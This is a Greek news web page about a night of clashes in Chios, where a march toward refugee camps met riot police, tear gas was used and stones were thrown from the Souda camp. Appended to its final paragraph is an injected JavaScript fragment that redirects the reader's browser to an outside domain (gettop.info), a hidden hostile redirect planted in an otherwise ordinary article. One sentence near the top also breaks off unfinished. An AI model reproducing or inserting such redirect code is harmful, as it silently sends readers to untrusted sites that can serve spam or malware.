Εφιαλτική νύχτα με επεισόδια κι έκτροπα στη Χίο

0
9

 

Το προσφυγικό πυροδότησε νέες αψιμαχίες στη Χιο χθες το βράδυ κατά το οποίο σημειώθηκαν αναταραχές κι έκτροπα κατά

Στην πορεία που ακολούθησε της συγκέντρωσης για το προσφυγικό την οποία οργάνωσαν ομάδες πολιτών, με κατεύθυνση τους καταυλισμούς προσφύγων – μεταναστών στο ΔΗΠΕΘΕ και στη Σούδα, η πορεία ήρθε αντιμέτωπη με ισχυρές δυνάμεις της αστυνομίας και ΜΑΤ, που είχαν αποκλείσει την διαδρομή και τους έστελναν να συνεχίσουν την πορεία τους περιμετρικά από τον δημοτικό κήπο.

Οι πρώτες αψιμαχίες έγιναν στη διασταύρωση της οδού δημοκρατίας με την οδό μαρτύρων, δίπλα στο Εργατικό Κέντρο και στο ΔΗΠΕΘΕ, χωρίς να διασπαστεί ο αστυνομικός κλοιός, σύμφωνα με το astraparis.gr.

Η πορεία συνέχισε στη οδό Δημοκρατίας και οι συμμετέχοντες σε αυτήν επιχείρησαν να κατευθυνθούν προς τους καταυλισμούς από την οδό Οινοπίωνος, η οποία επίσης είχε αποκλειστεί από τις αστυνομικές δυνάμεις και τα ΜΑΤ.

Στο σημείο αυτό και περί τις 8 το βράδυ σημειώθηκαν συγκρούσεις των αστυνομικών με τους διαδηλωτές, έγινε περιορισμένη χρήση χημικών, ενώ στο τέλος οι αστυνομικοί υποχώρησαν και άνοιξαν τον δρόμο, στην πορεία που κατευθύνθηκε προς την πίσω πλευρά του καταυλισμού της Σούδας.

Στην είσοδο του καταυλισμού είχαν συγκεντρωθεί ισχυρές αστυνομικές δυνάμεις, ενώ μέσα από τον καταυλισμό είχαν ξεσηκωθεί ομάδες προσφύγων και μεταναστών, οι οποίοι είχαν προετοιμασθεί να αντιμετωπίσουν επίθεση, ενώ εκτός από τα συνθήματα κάποια στιγμή άρχισαν να πετούν και πέτρες προς την κατεύθυνση των αστυνομικών, χωρίς – ευτυχώς – να σημειωθούν τραυματισμοί.

Η πορεία κατέληξε στην πλατεία Βουνακίου, όπου ομάδες παρέμεναν συγκεντρωμένες μέχρι αργά και λίγο πριν τις 22.00. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here